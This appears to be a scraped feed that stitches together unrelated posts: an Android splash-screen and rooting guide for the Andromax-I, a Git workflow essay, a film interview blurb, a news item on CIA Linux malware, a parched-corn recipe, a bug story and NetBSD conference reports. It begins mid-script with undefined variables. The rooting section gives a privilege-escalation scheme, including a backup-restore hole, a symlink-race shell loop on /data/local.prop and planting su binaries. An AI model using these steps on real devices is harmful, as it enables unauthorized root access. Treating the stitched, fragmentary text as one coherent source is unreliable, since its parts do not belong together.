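# With a real dump, delete these two lines and point dd at your splash.img.
dd if=/dev/zero of=splash.img bs=1024 count=800 2>/dev/null
printf 'PNG-HERE' | dd of=splash.img bs=1 seek="$START" conv=notrunc 2>/dev/null

# Copy the inclusive byte range [START, END] into logo.png.
dd if=splash.img of=logo.png bs=1 skip="$START" count="$LEN" 2>/dev/null
```

On a real dump you would then check that logo.png really starts with the PNG signature bytes before flashing anything back.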

----------------------------------------------------------------------------------------------------------

What is a splash screen?
A splash screen is the image that appears while a game or program is starting up or loading. Unlike Android's boot animation, which contains many images, the splash screen appears first and is then followed by the boot animation.

----------------------------------------------------------------------------------------------------------
Fastboot only, without the image
https://www.dropbox.com/s/a0zdolqmjmda70s/fastboot%2Bscript.rar

Here's a ready-made one, like the picture above.
Only for firmware version E667.6.03.00.ID11, not E667.6.01.08.ID11.
Check first whether your version matches: dial *#0000# or *1973460#.
Kernel version doesn't matter; ROM doesn't matter.

Via fastboot
https://www.dropbox.com/s/a5blhhfye3phx9y/Splash_Andromaxi.rar

Via CWM [updater script from Tablin]
https://www.dropbox.com/s/6b8uq3br54iwbv2/Splash.zip

Splash back to the stock SF logo via CWM [updater script from Tablin]
https://www.dropbox.com/s/szx4wgcg9727caa/Splash_Stock.zip

Once again: check that your firmware already reads E667.6.03.00.ID11 before going ahead with flashing Splash.zip, or your Maxi will turn into a brick.

*** If you'd rather flash via CWM, just overwrite the IMG we made into the ZIP. 'Overwrite' means the file name must be exactly the same as the file inside the ZIP.

*** To be safe, CWM users should inspect the updater-script inside the ZIP.
Open the ZIP, navigate to "META-INF\com\google\android\", and open Updater-Script with Notepad, the Maxi's built-in text editor, or anything else.

Check these lines:
package_extract_file("splash.img", "/dev/block/mmcblk0p5");
package_extract_file("splash.img", "/dev/block/mmcblk0p20");
Make sure they point to 0p5 and 0p20.
----------------------------------------------------------------------------------------------
----------------------------------------------------------------------------------------------
You can update the firmware to E667.6.03.00.ID11 by running the 7 November TF UPDATE: hold [Power + VolUp + VolDown] eg909v1 . Don't forget to dial *#0000# afterwards.

Link to the TF Update thread.
http://www.facebook.com/groups/428486680533882/doc/440932139289336/
----------------------------------------------------------------------------------------------
source: unofficial Smartfren Andromax-I Facebook group
          ANDROMAXI SCRIPT & CWM Based Recovery   
====================================
ANDROMAXI SCRIPT & CWM Based Recovery
by : Tablin Arya Juanda
====================================

DISCLAIMER: I am not responsible for anything that goes wrong. I have tried this on my own device and it works as intended.

====================================
-----------Andromaxi HS-EG909 Script---------------
----------------latest version : v 1.1------------------
====================================
Run the process on Windows; the script currently supports the Windows operating system

Menu/Feature :
---Run In Fastboot ---
1.Install cwm based recovery
2.Install touch recovery
3.restore stock recovery
4.Reboot

---Run In ADB ---
5.Root via ADB (for advanced users only)
6.Unroot via ADB (not recommended)
7.Init.d Support
8.Reboot
9.Reboot Recovery
0.Reboot Bootloader (fastboot)


More features to come... 
Please download cwm-recovery.img, touch-recovery.img and stock-recovery.img
and place them inside the data folder, so the files will be
Andromaxi/
Andromaxi/Andromaxi.bat
Andromaxi/Notes.txt
Andromaxi/data/* (adb, fastboot etc)
Andromaxi/data/cwm-recovery.img
Andromaxi/data/touch-recovery.img
Andromaxi/data/stock-recovery.img
To run the script, just double-click Andromaxi.bat and follow the prompts..

Extra :
- bootanimation.zip from CM10 (480x800 boot animation) install in /system/media/
- CWM-SuperSU-v0.99.zip (SuperSU App and su binary, busybox not included) install via cwm recovery

Menus 1 - 4 run in fastboot
Menus 5 - 0 run over ADB (see the notes below)
How to install adb or fastboot: look that up yourself

Download Andromaxi.zip and extract it; the supporting files for adb and fastboot are already inside (the drivers are not)
The cwm-recovery.img, touch-recovery.img and stock-recovery.img files are deliberately kept separate, because I may update them later; download them and put them in the data folder.
You can also try other CWM versions and rename them to cwm-recovery.img

For example: download 6.0.1.9-cwm-recovery.img (version 6.0.1.9), rename it to cwm-recovery.img and put it in the data folder

Download : https://www.dropbox.com/sh/dptph0ldj5cegvu/LvgTq-6iPH

To run the script, just run Andromaxi.bat and pick the menu you want..

The easiest way to install the ADB and fastboot drivers is to connect the device to the PC in data connection mode and install the bundled Smartfren application..

A note on enabling the ADB connection, since many people have asked:
  • Connect the Andromax-I to the computer with a USB cable
  • Choose: data connections
  • A CD-ROM will appear on the computer for modem installation; install it if it isn't installed yet
  • Once done, eject the CD (this enables the ADB connection (debugging))
  • The CD needs to be ejected every time you want to run adb.exe
  • Alternatively, install the Android SDK
  • Make sure adb can connect properly
  • Make sure vendor id 0x109b is in C:\Users\Your User Name\.android\adb_usb.ini
  • If there is no .android folder in C:\Users\Your User Name\, copy the .android folder from inside the Andromaxi folder to C:\Users\Your User Name\

Last: one more reminder: DO IT AT YOUR OWN RISK

===========================================================
CWM Based Recovery
===========================================================

Source : https://github.com/CyanogenMod/android_bootable_recovery
Latest version : 6.0.2.3

Working:
  • Backup
  • Restore
  • Install zip (sdcard, internal sd, via adb)
  • wipe dalvik cache
  • wipe cache
  • wipe data
  • fix permissions
  • Partition SD card (to create a second partition (/sd-ext) and a swap partition)

Bug:
  • Reboot and 'reboot recovery' can sometimes take quite a while (don't panic; if it really won't reboot, pull the battery)

Download : https://www.dropbox.com/sh/dptph0ldj5cegvu/LvgTq-6iPH

If you use the Andromaxi script above, the script expects the images at these locations:
1.Install cwm based recovery >>> /data/cwm-recovery.img
2.Install touch recovery >>> /data/touch-recovery.img
3.restore stock recovery >>> /data/stock-recovery.img

so rename the image to match the names above if needed,
e.g. 6.0.2.3-cwm-recovery.img >>> cwm-recovery.img

Update: if newer finds or newer versions turn up, I will update this

Latest Build
  • 6.0.2.3-cwm-recovery.img : custom build using the 6.0.2.3 source, the 8 November kernel + some files from the stock recovery (fix for the reboot issue: I hope.... )

Please rename that file to cwm-recovery.img before installing with the Andromaxi script >>> /data/cwm-recovery.img

Note :
touch-recovery.img was machine-built, because I haven't obtained the source code for the touch part... there may be errors or features that don't work yet... feel free to test it, but I recommend just using the regular one..

===========================================================
ROOT/UNROOT VIA ADB, without recovery

Notes: this is no longer needed, since rooting can now be done by installing a zip through CWM recovery..

Requirement:


Scheme:
  • Exploit a hole in ICS's backup-restore that lets us write to /data
  • Restore with fakebackup.ab
  • Shell exploit: "while ! ln -s /data/local.prop /data/data/com.android.settings/a/file99; do :; done"
  • Install su and busybox into /system/xbin
  • Install superuser.apk into /system/app

Steps:
  • Install Terminal Emulator on the Andromax-I: https://play.google.com/store/apps/details?id=jackpal.androidterm&hl=en
  • Download Andromaxi.zip and extract it
  • Connect the Andromax-I to the computer with a USB cable
  • Choose: data connections
  • A CD-ROM will appear on the computer for modem installation; install it if it isn't installed yet
  • Once done, eject the CD (this enables the ADB connection (debugging))
  • The CD needs to be ejected every time you want to run adb.exe
  • Alternatively, install the Android SDK
  • Make sure adb can connect properly
  • Make sure vendor id 0x109b is in C:\Users\Your User Name\.android\adb_usb.ini
  • If there is no .android folder in C:\Users\Your User Name\, copy the .android folder from inside the Andromaxi folder to C:\Users\Your User Name\
  • Open the Andromaxi folder
  • Run Andromaxi.bat
  • Pick the mode you want: 3 to root, 4 to unroot
  • When asked to restore, open the Andromax-I and choose restore
  • During rooting, mid-process after the reboot, Android will throw a SystemUI crash error; this means the exploit went in and the Andromax-I has entered emulator mode, so we can slip in the su and busybox binaries and superuser.apk
  • When the error appears, open Terminal Emulator and type: am start -n com.android.settings/.deviceinfo.UsbSettingsManager (capitalization matters)
  • This opens the USB options so the rest of the process can continue (an ADB connection is needed -- don't forget to eject the CD to enable debugging, or the process cannot continue)
  • To unroot, just pick menu no. 4

Another method: http://www.cidtux.net/2/post/2012/11/cara-root-smartfren-andromax-i-ad683g-hisense-eg909-di-linux.html
Basically the same principle, only it uses Linux and a different method for installing su, busybox and superuser

If it fails, the process can be repeated; at worst, do a factory reset from Settings, which will wipe your data and the applications you have installed

One more reminder: DO IT AT YOUR OWN RISK

For testing only; if you're not sure, wait for the other masters, e.g. a recovery-mode method that's faster and less hassle....

NB: Sorry the script is in English ...

Hope this is useful; please correct me if anything is wrong. I've only just got an Android ... still a newbie

thanks: sumberValid

          My Git Workflow   

Git’s great! But it’s difficult to learn (it was for me, anyway) – especially the index, which, unlike the power-user features, comes up in day-to-day operation.

Here’s my path to enlightenment, and how I ended up using the index in my particular workflow. There are other workflows, but this one is mine.

What this isn’t: a Git tutorial. It doesn’t tell you how to set up git, or use it. I don’t cover branches, or merging, or tags, or blobs. There are dozens of really great articles about Git on the web; here are some. What’s here are just some pictures that aren’t about branches or blobs, that I wished I’d been able to look at six months ago when I was trying to figure this stuff out; I still haven’t seen them elsewhere, so here they are now.

My brief history with Git

I started using Git about six months ago, in order to productively subcontract for a company that still uses Perforce. Before that I had been a happy Mercurial user; before that, a Darcs devotee; before that, a mildly satisfied Subversion supplicant; and before that, a Perforce proponent. (That last was before the other systems even existed. I introduced Perforce into a couple of companies that had previously been using SourceSafe(!) – including the one I was now contracting for.)

Each of these systems has flaws. Perforce and Subversion require an always-on connection and make branching (and merging) expensive, and Perforce uses pessimistic locking too (you have to check a file out before you can edit it). I got hit by the exponential merge bug in Darcs (since fixed?); a deeper problem was that I found I wanted to be able to go back in time more often than I needed to commute patches, whereas Darcs makes the latter easy at the expense of the former – so Darcs’ theory of patches, although insightful and beautiful, just didn’t match my workflow.

Git’s problem is its complexity. Half of that is because it’s actually more powerful than the other systems: it’s got features that make it look scary but that you can ignore. Another half is that Git uses nonstandard names for about half its most common operations. (The rest of the VCS world has more or less settled on a basic command set, with names such as “checkout” and “revert”. Not Git!) And the third half is the index. The index is a mechanism for preventing what you commit from matching what you tested in your working directory. Huh?

Git without the index

I got through my first four months of Git by pretending it was Subversion. (A faster implementation of Subversion, that works offline, with non-awful branches and merging, that can run as a client to Perforce – but still basically Subversion.) The executive summary of this mode of operation is that if you use “git commit -a” instead of “git commit”, you can ignore the index altogether. You can alias ci to “commit -a” (and train yourself not to use the longer commit, which I hadn’t been doing anyway), and then you don’t have to remember the command-line argument either:

$ cat ~/.gitconfig
[alias]
  ci = commit -a
  co = checkout
  st = status -a
$ git ci -m 'some changes'

Adding Back the Index

Git keeps copies of your source tree in the locations in this diagram [1]. (I’ll call these locations “data stores”.)

The data store that’s new, relative to every other DVCS that I know about, is the “index”. The one that’s new relative to centralized VCS’s such as Subversion and Perforce is the “local repository”.

The illustration shows that “git add” is the only (everyday) operation that can cause the index to diverge from the local repository. The only reason (in Subversion-emulation mode) to use “git add” is so that “git commit” will see your changes. The -a option to “git commit” causes “git commit” to run “git add -u” first, so you never need to run “git add -u” explicitly, and the index stays in sync with the repository head. This is how the trick in “git without the index” works: if you always commit via “git commit -a”, you can ignore the index [2].

So what’s the point of the index? Is it because Linus likes complicated things? Is it to one-up all the other repositories? Is it to increase the complexity of the system, so that you have a chance to shoot yourself in the foot if you’re not an alpha enough geek?

Well, probably. But it’s good for something else as well. Several things, actually; I’ll show you one (that I use), and point you to another.

But first, a piece of background that helps in understanding Git. Git isn’t at its core a VCS. It’s really a distributed versioning file system, down to its own fsck and gc. It was developed as the bottom layer of a VCS, but the VCS layer, which provides the conventional VCS commands (commit, checkout, branch), is more like an uneven veneer than like the “porcelain” it’s sometimes called: bits of file system (git core) internals poke through.

The disadvantage of this (leaky) layering is that Git is complicated. If you look up how to diff against yesterday’s 1pm sources in git diff, it will send you to git rev-parse from the core; if you look up git checkout, you may end up at git-check-ref-format. Most of this you can ignore, but it takes some reading to figure out which.

The advantage of the layering is that you can use Git to build your own workflows. Some of these workflows involve the index. Like the other fancy Git features, building your own workflows is something that you can ignore initially and add when you get to where you need it. This is, historically, how I’ve used the index: I ignored it until I was comfortable with more of Git, and now I use it for a more productive workflow than I had with other VCS’s. It’s not my main reason for using Git, but it’s turned from a liability into a strength.

My Git Workflow

Added: By way of illustration, here’s how I use Git. I’m not recommending this particular workflow; instead, I’m hoping that it can further illustrate the relation between the workspace, the index, and the repository; and also the more general idea of using Git to build a workflow.

I use the index as a checkpoint. When I’m about to make a change that might go awry – when I want to explore some direction that I’m not sure if I can follow through on or even whether it’s a good idea, such as a conceptually demanding refactoring or changing a representation type – I checkpoint my work into the index. If this is the first change I’ve made since my last commit, then I can use the local repository as a checkpoint, but often I’ve got one conceptual change that I’m implementing as a set of little steps. I want to checkpoint after each step, but save the commit until I’ve gotten back to working, tested code. (More on this tomorrow.)

Added: This way I can checkpoint every few minutes. It’s a very cheap operation, and I don’t have to spend time cleaning up the checkpoints later. “git diff” tells me what I’ve changed since the last checkpoint; “git diff head” shows what’s changed since the last commit. “git checkout .” reverts to the last checkpoint; “git checkout head .” reverts to the last commit. And “git stash” and “git checkout -m -b” operate on the changes since the last commit, which is what I want.
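The checkpoint cycle above can be run as a transcript in a throwaway repository (the repository name, file, and identity settings here are made up for the demo):

```shell
# A throwaway repo to demonstrate the checkpoint cycle.
cd "$(mktemp -d)"
git init -q demo && cd demo
git config user.email you@example.com
git config user.name "You"
printf 'v1\n' > code.txt
git add code.txt
git commit -q -m 'initial commit'

printf 'risky change\n' > code.txt
git add -u              # checkpoint into the index
git diff                # empty: nothing has changed since the last checkpoint
git diff HEAD           # shows everything since the last commit

printf 'a step too far\n' > code.txt
git checkout -- .       # roll back to the last checkpoint ('risky change')
git checkout HEAD -- .  # or roll all the way back to the last commit ('v1')
```

The two checkout forms at the end are the interesting part: the pathspec form without HEAD restores from the index (the checkpoint), while the HEAD form discards both the working-tree changes and the checkpoint.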

I’m most efficient when I can fearlessly try out risky changes. Having a test suite is one way to be fearless: the fear of having to step through a set of manual steps to test each changed code path, or worse yet missing some, inhibits creativity. Being able to roll back changes to the last checkpoint eliminates another source of fear.

I used to make copies of files before I edited them; my directory would end up littered with files like code.java.1 and code.java.2, which I would periodically sweep away. Having Git handle the checkpoint and diff with them makes all this go faster. (Having painless branches does the same for longer-running experiments, but I don’t want to create and then destroy a branch for every five-minute change.)

Here’s another picture of the same Git commands, this time shown along a second axis, time, proceeding from top to bottom. [This is the behavior diagram to the last picture’s dataflow diagram. Kind of.] A number of local edits add up to something I checkpoint to the index via “git add -u”; after a while I’ve collected something I’m ready to commit; and every so many commits I push everything so far to a remote repository, for backup (although I’ve got other backup systems), and for sharing.

I’ve even added another step, releasing a distribution, that goes outside of git. This uses rsync (or scp, or some other build or deployment tool) to upload a tar file (or update a web site, or build a binary to place on a DVD).

Some Alternatives

Ryan Tomayko has written an excellent essay about a completely different way to use the repository. I recommend it wholeheartedly.

Ryan’s workflow is completely incompatible with mine. Ryan uses the repository to tease apart the changes in his working directory into a sequence of separate commits. I prefer to commit only code that I’ve tested in my directory, so Ryan’s method doesn’t work for me. I set pending work aside via git stash or git checkout -m -b when I know I might need to interrupt it with another change; this sounds like it might not work for Ryan. Neither one of these workflows is wrong (and I could easily use Ryan’s, I’m just slightly more efficient with mine); Git supports them both.

There’s another way to do this particular task – of checkpointing after every few edits, but only persisting some of these checkpoints into the repository. This is to commit each checkpoint to the repository (and go back to ignoring the index – at least for checkpointing – so this might work with Ryan’s), and rebase them later. Git lets you squash a number of commits into a single commit before you push it to a public repository (and edit, reorder, and drop unpushed commits too) – that’s the rebase -i block in the previous illustration, and you can read about it here. This is a perfectly legitimate mode of operation; it’s just one that I don’t use.

Both of these alternatives harken back to Git as being a tool for designing VCS workflows, as much as being a VCS system itself. The reasons I don’t use them myself bring us to Commit Policies, which I’ll write about tomorrow.



  1. This picture shows just those commands that copy data between the local repository, the remote repository, the index, and your workspace. There’s lots more going on inside these repositories (branches, tags, and heads; or, blobs, trees, commits, and refs). In fact, during a merge, there’s more going on inside the index, too (“mine”, “ours”, and “theirs”). To a first approximation, all that’s orthogonal to how data gets between data stores; we’ll ignore it.

  2. This isn’t quite true. You still need to use “git add” on a new file to tell git about it, and at that point the file is in your index but not in your repository. You still don’t need to think about the index in order to use it this way.


          Sami Blood / Film School interview with Director Amanda Kernell   
SAMI BLOOD is the debut feature from writer/director Amanda Kernell, who based her beautifully rendered film on her own grandmother's life. Set in 1930s Sweden during the pre-Nazi eugenics movement, SAMI BLOOD follows Elle, a young indigenous Lapland girl made to feel like an inferior species when she’s subjected to indoctrination and race biology at a Swedish boarding school. Elle escapes, and in doing so is estranged from her sister, her family and her culture. SAMI BLOOD is a unique and intimate perspective on the history of the Sami people, and tells a story of oppression that resonates across borders and generations. The film features a breakthrough performance from its young lead actress Lene Cecilia Sparrok, who had never acted before and is Sami herself. She stars in the film alongside her sister Mia Sparrok. Director and writer Amanda Kernell joins us to talk about her heart-wrenching story of a young woman struggling to find a place in an increasingly hostile world. 90% on Rotten Tomatoes. For news and updates go to: sami-blood.synergetic.tv facebook.com/sameblod Los Angeles screening: beginning June 30, 2017 at the Laemmle Monica Film Center
          Outlaw Country: WikiLeaks reveals CIA malware for Linux   

Outlaw Country makes it possible to redirect all outbound traffic from a target computer to computers controlled by the CIA, with the aim of stealing files from the infected computer or sending files to it. The malware consists of a kernel module that creates hidden netfilter tables on the target Linux computer, through which network packets can be manipulated. An operator can create rules that take precedence over the existing iptables rules.

tags: cia, outlaw country, malware, linux, wikileaks

» original article (www.adslzone.net)


          Making Toasted Corn Sludge - A Superfood Of Its Day   

After having successfully survived eating year-old home-made hardtack, I was psyched to see that Jas. Townsend and Son had a new series for me to try: preparing and cooking parched corn.

Parched corn, like pemmican and hardtack, was a superfood in its day. Not because it was so nutritious or tasty, but because it was cheap to make, relatively nutritionally dense, quite portable and had a long shelf life.

Here are two sources that describe how parched corn was used. First, from American Indian Corn Dishes by Muriel H. Wright:

Botah Kapussa (Cold Flour) : Shell corn from the cob when the grain has reached the stage where it is firm but not dry. Place the shelled corn in a large pot of hot ashes, keeping the pot over coals of fire until the corn is parched a golden brown, in the meantime stirring the grain to keep it from scorching. Put the corn into the fanner, and clean off the ashes. Next pound the corn in the mortar until the husks are loosened. Again clean out the husks from the grain in the fanner. Beat the clean corn into flour in the mortar. This parched corn flour may be sweetened with enough sugar to taste. Add enough water to dampen a small serving, and eat as a cereal. A small amount of botah kapussah will go a long way as food.

In tribal times, the Indian hunter took a small bag of this unsweetened food with him on long expeditions, often traveling many days with nothing else to eat except botaic kapussuh, a little at a time generally mixed with water. This cold flour was a boon on a long hunting expedition because a small amount was nourishing, and a bag of it was light and easy to carry.

And here's one from encyclopediavirginia.org:

For travel, some Indian families carried dried venison, but most preferred rockahominy: dried parched corn that was beaten into powder and thus easily carried in a bag. A few handfuls of rockahominy, with water scooped out of trailside streams, served as an entire meal. (Europeans would later add sugar to the mix for palatability.)

Tales like these had me convinced: I needed to parch some corn, and perhaps add it to my hiking / backpacking diet.

Parching corn didn't look that hard: you take dry corn, toast it, and then grind it up. But where does one find dried corn? Fortunately, I found this citified recipe on the web. It called for taking frozen sweet corn, dehydrating it, and then tossing it into a frying pan to parch it. So that's what I did.

While dehydrating took hours, it wasn't really a lot of work. What was surprising was that when I was done, the dehydrated corn was pretty much inedible. This wasn't looking so promising.

I then grabbed a frying pan, sprayed a bit of olive-oil Pam into it (probably too much) and dropped in some dry kernels. I then turned on the heat and waited. That was a bad idea, because I definitely ended up over-cooking the first batch. But once I got the hang of shimmying the pan around, I could see how you could toast the corn without burning it.

When I was done with the parching process I had two batches. One of these batches I dropped into our hand blender's chopper and zapped it for 30 seconds or so. Here were the results:

Over the next couple days I noshed on my creation. I mixed boiling water with the powder to make a sort of sludge, while the larger kernels I just ate by the handful.

The good news is, parching the corn made the inedible dehydrated kernels quite edible. And they were nice and dry (minus any extra olive oil), so I could see how this could resist spoilage. In terms of taste, it was OK. The sludge was definitely palatable, and if I were eating it at the end of a long day of hiking, I'd have rated it a 10 out of 10. But in my kitchen, it was just OK. Nothing special. It was like eating toasted corn sludge, which of course, is all it was.

Snacking on the larger kernels grew on me. Again, they weren't heavenly, but I could totally see paying a ridiculous sum of money at Whole Foods for the privilege of buying a bag of this stuff.

Will it get added to my backpacking menus? Hard to say. But I can report that this was an awesome culinary experiment and recommend you try it. That, and I have even more respect for the Indian hunters who lived off a handful of this stuff a day.


          ASUS ROG Strix Radeon RX580 OC Edition Performance on Ubuntu Linux KVM PCI Pass-Through    

For those following our Kernel-based Virtual Machine (KVM) coverage here is a status update.

Initially my plan was to evaluate on the new Ryzen AM4 platform, but I've encountered some delays. More specifically, software troubles related to PCI Pass-Through -- without stable PCI Pass-Through, the entire purpose of the evaluation is defeated.



          Bug stories: The data corruption in the cluster   

The bug started as pretty much all the others do. “We have a problem when replicating from a Linux machine to a Windows machine; I’m seeing some funny values there.” This didn’t raise any alarm bells; after all, that was the point of checking what was going on in a mixed-mode cluster. We didn’t expect any issues, but it wasn’t surprising that they happened.

The bug in question showed up as an invalid database id in some documents. In particular, it meant that we might have node A, node B and node C in the cluster, and running a particular scenario suddenly started also reporting node Ω, node Σ and other fun stuff like that.

And so the investigation began. We were able to reproduce this error once we put enough load on the cluster (typically around the 20th million document write or so), and it was never consistent.

We looked at how we save the data to disk, we looked at how we read it, and we scanned all the incoming and outgoing data. We sniffed raw TCP sockets and we looked at everything from the threading model to random corruption of data on the wire, from our own code reading the data to a manual review of the TCP code in the Linux kernel.

The latter might require some explanation: it turned out that setting TCP_NODELAY on Linux made the issue go away. That only made things a lot harder to figure out. What was worse, this corruption only ever happened in this particular location, never anywhere else. It was maddening, and about three people worked on this particular issue for over a week with the sole result being: “We know roughly where it’s happening, but no idea why or how”.

That in itself was a very valuable thing to have, and along the way we were able to fix a bunch of other stuff that was found under this level of scrutiny. But the original problem persisted, quite annoyingly.

Eventually, we tracked it down to this method:

We had been there before, and we had looked at the code, and it looked fine. Except that it wasn’t. In particular, there is a problem when the range we want to move overlaps with the range we want to move it to.

For example, consider that we have a buffer of 32KB, and we read from the network 7 bytes. We then consumed 2 of those bytes. In the image below, you can see that as the Origin, with the consumed bytes shown as ghosts.

[image: the buffer before the move, with the consumed bytes shown as ghosts]

What we need to do now is move the “Joyou” to the beginning of the buffer, but note that we need to move it from 2 – 7 to 0 – 5, which are overlapping ranges. The issue is that we want to be able to fully read “Joyous”, which requires us to do some work to make sure that we can. This ReadExactly piece of code was written with the knowledge that it will be called with at most 16 bytes to read, and the buffer size is 32KB, so there was an implicit assumption that those ranges can’t overlap.

When they do… well, you can see in the image how the data is changed with each iteration of the loop. The end result is that we corrupted our buffer and messed everything up. The Linux TCP stack had no issue; it was all in our code. The problem is that, while it is rare, it is perfectly fine to fragment the data you send into multiple packets, each with a very small length. The reason TCP_NODELAY “fixed” the issue was that it probably didn’t trigger the multiple small buffers one after another in that particular scenario. It is also worth noting that we tracked this down to a specific load pattern that would cause the sender to split packets in this way and generate this error condition.

That didn’t actually fix anything, since the corruption could still happen; but I traced the code, and I think this happened with more regularity here because we hit the buffer just right, sending a value over the buffer boundary in just the wrong way. The fix for this, by the way, is to avoid the manual buffer copying and use memmove(), which is safe to use for overlapping ranges.

That leaves us with the question: why did it take us so long to find this out? For that matter, how could this error surface only in this particular case? There is nothing really special about the database id, and this particular method is called a lot by the code.

Figuring this out took even more time. Basically, this bug was hidden by the way our code validates the incoming stream. We don’t trust data from the network, and we run it through a set of validations to ensure that it is safe to consume. When this error happened in the normal course of things, higher-level code would typically detect it as corruption and close the connection. The other side would retry, and since this is timing-dependent, it would very likely be able to proceed. The issue with database ids is that they are opaque binary values (they are GUIDs, so there is no structure at all that is meaningful to the application). That means that only when we got this particular corruption on that particular field (and on no other field) would the data pass validation and actually surface the error.

The fix was annoyingly simple given the amount of time we spent finding it, but we were able to root out a significant bug as a result of the real-world tests we run.


          Vuln: Linux kernel CVE-2017-9074 Local Denial of Service Vulnerability   
          Vuln: Linux kernel CVE-2017-9075 Local Denial of Service Vulnerability   
          Vuln: Linux Kernel CVE-2017-8890 Denial of Service Vulnerability   
          Vuln: Linux Kernel 'drivers/usb/serial/omninet.c' Local Denial of Service Vulnerability   
          AsiaBSDCon 2015   

AsiaBSDCon 2015 was held in Tokyo on 12-15 March. It was my first time attending, and with a big NetBSD community in Japan I was very interested to go. Links to most of the talks and slides mentioned below are on the main NetBSD presentations site.

On Friday we had both a closed NetBSD developer session in the morning and an open NetBSD birds-of-a-feather session in the evening. We had developers from Europe, the US and Canada as well as Japan. The BoF session, with around 25 attendees, had a talk by Kazuya Goda, who is not yet a developer but will apply soon, on Development of vxlan(4) using the rump kernel. Vxlan tunnels Ethernet frames over UDP and is often used in datacentre multi-tenant applications and for VPNs. Using the rump kernel made porting the FreeBSD code extremely easy: the code was tested in userspace, with a tunnel to a FreeBSD box to check interoperability, and no changes were needed to make it run in the kernel.

Taylor Campbell (riastradh@) talked about the status of DRM/KMS, the direct rendering framework for graphics that is in NetBSD-current and will be in 7.0. He had fixed several bugs in the days before the talk, so now is a good time to try out the code on your hardware before 7.0 is out. Porting to non-x86 platforms that have compatible cards (radeon) would also be useful at this point.

Makoto Fujiwara (mef@) and Ryo Onodera (ryoon@) talked about pkgsrc, including how to package up software on GitHub, which is now really easy. With the closure of Google Code a whole lot more projects are moving to GitHub, so it is useful that packaging is so easy.

Jun Ebihara (jun@) gave an overview of the Japan NetBSD users group, which travels all around Japan to a large number of events with a large collection of mainly very small machines which run NetBSD current. These include new machines like the Raspberry Pi and Cubieboard as well as old favourites such as the Zaurus, Jornada and Dreamcast. These were also on display at the conference, and got rather more attention than the very noisy blade server running FreeBSD opposite.

The conference proper, on Friday and Saturday, had many NetBSD-related talks. A highlight was Dennis Ferguson's (dennis@) keynote on modernising the BSD network stack, based on his experience building commercial BSD-based routers; he was a founding engineer at Juniper. We got some history, as well as some detailed recommendations about structuring the network stack's data structures to match modern protocol hierarchies.

Still on networking, Ryota Ozaki (ozaki@) talked about the work that IIJ, conference sponsor and home to many of the Japanese developers, is doing on supporting MSI interrupts and multi-queue devices, improving performance on multicore systems. Martin Husemann (martin@) talked about running big-endian ARM on new hardware, a platform that is not used much, and found some bugs.

On Sunday, Taylor talked about doing cross-compilation in pkgsrc properly. FreeBSD has taken the approach of using qemu userspace emulation, but there are problems with this that have to be fudged around, while almost everything can be cross-compiled properly with dedication. Perl and Python are still an issue, and need volunteers. I (justin@) gave a talk about the rump kernel, and how to make driver development and debugging easier.

There was also lots of excellent food, interesting talks about the rest of the BSD family, and a lot of conversations about many aspects of NetBSD. I highly recommend coming along next year. The call for papers will be earlier, so start planning now.

          EuroBSDCon 2009 - Cambridge, UK   

The 8th EuroBSDCon was held at University of Cambridge in the United Kingdom on 18 - 20 September 2009. This year four NetBSD Developers, Alistair Crooks, Adam Hamsik, Joerg Sonnenberger and Arnaud Ysmal, presented a range of topics including Role Based Access Control, Journaling FFS, NetBSD LVM, The pkgsrc wrapper framework, A BSD licensed PGP library, and fs-utils: File systems access tools in userland.

Role Based Access Control - Alistair Crooks

This talk describes the design, implementation and real-world experience of implementing Role-Based Access Control in the NetBSD kernel. Using the existing kauth(9) facility, root's privileged operations have been split into 57 separate roles, and this talk will explain the different role groupings, the development process, design and implementation decisions, kernel and user level changes necessary, and practical lessons learned.

Slides

Paper

Journalling FFS - Joerg Sonnenberger

The talk reintroduces FFS and the consistency constraints for meta data updates. It introduces the WAPBL changes, both in terms of the on-disk format and the implementation in NetBSD. Finally the implementation is compared with other file systems and specific issues of and plans for the current implementation are discussed.

Slides

NetBSD LVM - Adam Hamsik

This talk introduces LVM as a method of allocating space on disk storage devices that is more flexible than conventional partitioning. A logical volume manager can stripe, mirror or otherwise combine disk partitions into bigger virtual partitions which can be easily moved, resized or manipulated in different ways while in use. Volume management is one form of disk storage virtualization used in operating systems.

The NetBSD LVM has two parts: userland tools and a kernel driver. The kernel driver is called device-mapper. The userland part is based on the Linux LVM tools developed by a community managed by Red Hat, Inc.

The device-mapper driver can create virtual disk devices according to a device table loaded into it. This table specifies which devices are used as a backend and at which offset on a particular device the virtual device starts. The device-mapper configuration is not persistent and must be loaded into the kernel after each reboot by the LVM tools.

Slides

Paper

The pkgsrc wrapper framework - Joerg Sonnenberger

The wrapper framework in pkgsrc serves two central roles: abstracting compiler specifics, and limiting the visibility of installed packages in combination with buildlink. It helps make package builds a lot more reproducible and decreases the number of patches for platforms that are not using GCC or ELF. The offered flexibility comes at a price, both in terms of execution speed and code complexity. This talk explains how the wrapper framework interacts with the rest of pkgsrc, analyzes the performance of the existing implementation and introduces a simpler and faster reimplementation.

Slides

Paper

netpgp - BSD-licensed privacy software - Alistair Crooks

This talk introduces the netpgp library, a BSD-licensed PGP library, which is compatible with the GNU Privacy Guard program (GPG or GNUPG). The library itself is described, and the suite of userland programs built around it, such as the signing/verification/encryption and decryption program, a program to manage keys, and a separate standalone verification program. Possible practical uses for the library are also provided, along with a demonstration of some of these uses.

Slides

Paper

fs-utils: File systems access tools in userland - Arnaud Ysmal

This talk introduces the fs-utils set of tools, an application suite which provides mtools-like file system access without requiring mount privileges or an in-kernel driver. fs-utils reuses the kernel file system drivers through the RUMP framework and the UKFS library instead of relying on a userspace reimplementation. It supports a total of 12 file systems from NetBSD plus FUSE file systems, and offers the same usage as the well-known tools (e.g. all of the flags of ls are supported).

Slides

Paper


          NetBSD developer summit in Cambridge/UK   

On Friday, the 18th of September, a group of NetBSD developers from all over the world met during a developer summit at the Fitzwilliam College in Cambridge/UK. It provided a great opportunity for developers to meet each other in person, to share ideas and to talk about ongoing and future projects.
The summit was organised by Stephen Borrill and sponsored by Precedence Technologies, a Cambridge based company selling NetBSD based products.

Based on a presentation by Alistair Crooks the roadmap for NetBSD 6.0 was discussed. Here are some of the highlights that are planned for NetBSD 6.0:

  • System:
    • kernel modules
    • POSIX shared memory
    • processor & cache aware scheduler
  • Networking:
    • Mobile IPv6
    • SCTP
    • netboot from HTTP
  • Storage:
    • LVM
    • ZFS
    • iSCSI initiator
    • devfs
  • Virtualisation:
    • Xen domU migration, suspend & resume
    • Xen balloon driver
    • Gaols via kauth (similar to FreeBSD jails)
